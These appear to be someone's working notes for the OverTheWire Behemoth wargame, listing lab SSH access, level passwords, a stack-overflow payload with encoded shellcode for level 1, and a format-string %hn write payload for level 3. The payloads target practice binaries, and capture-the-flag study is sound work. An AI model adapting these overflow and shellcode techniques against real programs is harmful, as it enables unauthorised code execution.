https://overthewire.org/wargames

location
ssh behemoth0@behemoth.labs.overthewire.org -p 2221
/etc/behemoth_pass/behemoth1

passwords
---------
0: behemoth0
1: 8JHFW9vGru
2: udgJeGECEW
3: sc5GZjEMld
4: kCr7E3fqaP

###################################
level1
r < <(python3 -c 'print("A" * 68 + "BBB", end="")'; printf "\xff\xff\xff\xff")

(python3 -c 'print("A" * 68 + "BBB", end="")'; printf "\x60\xd6\xff\xff";cat) | ./behemoth1

export shellcode=$(printf "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\xeb\x11\x5e\x31\xc9\xb1\x21\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x6b\x0c\x59\x9a\x53\x67\x69\x2e\x71\x8a\xe2\x53\x6b\x69\x69\x30\x63\x62\x74\x69\x30\x63\x6a\x6f\x8a\xe4\x53\x52\x54\x8a\xe2\xce\x81")

###################################
level2

###################################
level3

vulnerability will have something to do with format specifier
r < <(python3 -c 'print("A" * 4 + "B" * 4 + "C" *4 + "D" * 4 + "." + "%08x." * 4)')

<(printf "AAAA"; printf "\x68\xd2\xff\xff"; printf "BBBB"; printf "\x6a\xd2\xff\xff"; python3 -c 'print("%054876x%hn%010643x%hn")')

shellcode at 0xffffd66c
address to write this address (return address) 0xffffd268
(printf "AAAA"; printf "\x68\xd2\xff\xff"; printf "BBBB"; printf "\x6a\xd2\xff\xff"; python3 -c 'print("%054876x%hn%010643x%hn")';cat) | ./behemoth3
